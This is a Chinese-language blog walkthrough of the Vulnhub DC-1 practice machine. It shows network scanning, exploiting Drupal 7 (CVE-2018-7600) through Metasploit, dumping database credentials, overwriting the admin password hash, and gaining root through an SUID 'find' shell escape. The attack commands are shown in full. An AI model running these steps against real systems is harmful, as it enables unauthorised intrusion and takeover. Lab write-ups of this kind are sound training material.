Vulnhub DC-1靶場學習筆記

Loongten 發表於 2022-01-26

0x00 環境準備

本文介紹了Vulnhub中DC-1靶機的實戰滲透過程,實戰的目標是獲取到伺服器中的5個flag,最終目標是獲取到root目錄下的thefinalflag檔案:

測試環境 備註
Kali IP:192.168.100.100
DC-1 下載地址:https://www.vulnhub.com/entry/dc-1-1,292/

下載後解壓,雙擊DC-1.vmx即可使用VMware開啟靶機,開啟後確保Kali和DC-1的網路卡設定都為NAT模式。

0x01 資訊收集

目標發現:

Ⅰ 使用arp-scan進行內網掃描:

┌──(root💀kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:94:72:37, IPv4: 192.168.100.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:f9:e9:2f       VMware, Inc.
192.168.100.134 00:0c:29:d3:d1:4f       VMware, Inc.
192.168.100.254 00:50:56:e2:96:e6       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.933 seconds (132.44 hosts/sec). 4 responded

發現目標:192.168.100.134

Ⅱ 使用nmap進行內網掃描:

┌──(root💀kali)-[/home/kali]
└─# nmap -sP 192.168.100.100/24
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-26 10:22 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.100.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.100.2
Host is up (0.00038s latency).
MAC Address: 00:50:56:F9:E9:2F (VMware)
Nmap scan report for 192.168.100.134
Host is up (0.00022s latency).
MAC Address: 00:0C:29:D3:D1:4F (VMware)
Nmap scan report for 192.168.100.254
Host is up (0.00037s latency).
MAC Address: 00:50:56:E2:96:E6 (VMware)
Nmap scan report for 192.168.100.100
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.08 seconds

Ⅲ 使用masscan進行內網掃描:

┌──(root💀kali)-[/home/kali]
└─# masscan --ping 192.168.100.100/24                                                     
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-01-26 02:30:00 GMT
Initiating ICMP Echo Scan
Scanning 256 hosts
Discovered open port 0/icmp on 192.168.100.134
Discovered open port 0/icmp on 192.168.100.2

發現目標後進行進一步的資訊獲取:

使用masscan對目標192.168.100.134進行埠掃描:

┌──(root💀kali)-[/home/kali]
└─# masscan 192.168.100.134 -p0-65535 --rate=10000                                       
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-01-26 02:34:40 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 80/tcp on 192.168.100.134
Discovered open port 111/tcp on 192.168.100.134
Discovered open port 44077/tcp on 192.168.100.134

使用nmap對開放的埠進行更詳細的埠資訊掃描:

Vulnhub DC-1靶場學習筆記

┌──(root💀kali)-[/home/kali]
└─# nmap -p 80,111,44077 -A 192.168.100.134

通過nmap的掃描發現其80埠開放著Drupal 7的HTTP服務,111埠是rpcbind服務

0x02 通過MSF獲取flag1

通過百度搜尋Drupal 7可以查詢到Drupal 7.x 存在程式碼執行漏洞,漏洞編號為CVE-2018-7600 ,在kali輸入msfconsole進入MSF控制檯,通過search命令查詢CVE-2018-7600 的漏洞資訊:

Vulnhub DC-1靶場學習筆記

在控制檯輸入use exploit/unix/webapp/drupal_drupalgeddon2使用該模組,通過show options檢視需要設定的引數:

Vulnhub DC-1靶場學習筆記

此處只需設定rhosts為DC-1即可:set rhost 192.168.100.134,設定完成後使用exploit對靶機進行攻擊,成功連線到DC靶機並發現flag1:

Vulnhub DC-1靶場學習筆記

使用cat命令讀取flag1.txt的內容發現flag2的線索:

Vulnhub DC-1靶場學習筆記

0x03 查詢配置檔案發現flag2

通過對站點目錄進行查詢,在/var/www/sites/default目錄發現settings.php配置檔案,從配置檔案中獲取到兩條關於flag3的重要資訊:

Vulnhub DC-1靶場學習筆記

0x04 重置資料庫密碼得到flag3

Drupal資料庫中儲存的密碼雜湊由自帶的password-hash.sh生成,進入指令碼目錄/var/www/使用php ./scripts/password-hash.sh admin生成密碼為admin的雜湊,在此之前需要生成DC-1的互動shell:

meterpreter > shell
python -c "import pty;pty.spawn('/bin/bash')"

Vulnhub DC-1靶場學習筆記

生成密碼雜湊:

[email protected]:/var/www$ php ./scripts/password-hash.sh admin
php ./scripts/password-hash.sh admin

password: admin                 hash: $S$D9/JDc1I/3gkUftK3oHmHkkPHvYS4.UUIr7oXKgC6LPyGW13OOJY

通過之前獲取到的資料庫賬號密碼進入資料庫,通過查詢得知使用者的資訊儲存在drupaldb資料庫裡的users表中,密碼的欄位為pass:

mysql -udbuser -pR0ck3t
mysql> use drupaldb;
use drupaldb;
Database changed
mysql> select uid,name,pass from users;
select uid,name,pass from users;
+-----+-------+---------------------------------------------------------+
| uid | name  | pass                                                    |
+-----+-------+---------------------------------------------------------+
|   0 |       |                                                         |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
|   3 | user  | $S$DS3sDdTXVdMk68Xca2Dfcup7ciXU/wWQQhSHydK5bw0uivVh5ejb |
+-----+-------+---------------------------------------------------------+
4 rows in set (0.00 sec)

更新admin的密碼欄位:

update users set pass="$S$D9/JDc1I/3gkUftK3oHmHkkPHvYS4.UUIr7oXKgC6LPyGW13OOJY" where name="admin";

瀏覽器端訪問DC-1的Web服務,使用admin/admin直接登入,點選Dashboard得到flag3:

Vulnhub DC-1靶場學習筆記

獲得flag4 ,thefinalflag的線索:

Vulnhub DC-1靶場學習筆記

0x05 使用find命令查詢取得flag4

在shell中輸入find / -name "flag*"搜尋flag檔案:

[email protected]:/var/www$ find / -name "flag*"
find / -name "flag*"
/home/flag4
/home/flag4/flag4.txt
/var/www/flag1.txt
/usr/src/linux-headers-3.2.0-6-686-pae/include/config/zone/dma/flag.h
/usr/share/doc/tk8.5/examples/images/flagdown.xbm
/usr/share/doc/tk8.5/examples/images/flagup.xbm
/usr/include/X11/bitmaps/flagdown
/usr/include/X11/bitmaps/flagup
/usr/lib/gcc-4.9-backport/lib/gcc/i486-linux-gnu/4.9/plugin/include/flags.h
/usr/lib/gcc-4.9-backport/lib/gcc/i486-linux-gnu/4.9/plugin/include/flag-types.h
/usr/lib/perl/5.14.2/auto/POSIX/SigAction/flags.al
/sys/devices/virtual/net/lo/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags

讀取/home/flag4/flag4.txt獲得thefinalflag的線索:

Vulnhub DC-1靶場學習筆記

0x06 SUID提權獲取thefinalflag

suid可以讓呼叫者以檔案擁有者的身份執行該檔案,執行root使用者所擁有的suid的檔案,那麼執行該檔案的時候就是root使用者的身份。常用的suid提權指令:

nmap vim find bash more less nano cp

下列命令可以查詢在系統上執行的所有suid可執行檔案:

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

在DC-1的shell查詢suid可執行檔案:

[email protected]:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

/usr/bin/findfind命令具有suid許可權,提權得到root許可權並獲取到thefinalflag:

find / -exec "/bin/sh" \;

Vulnhub DC-1靶場學習筆記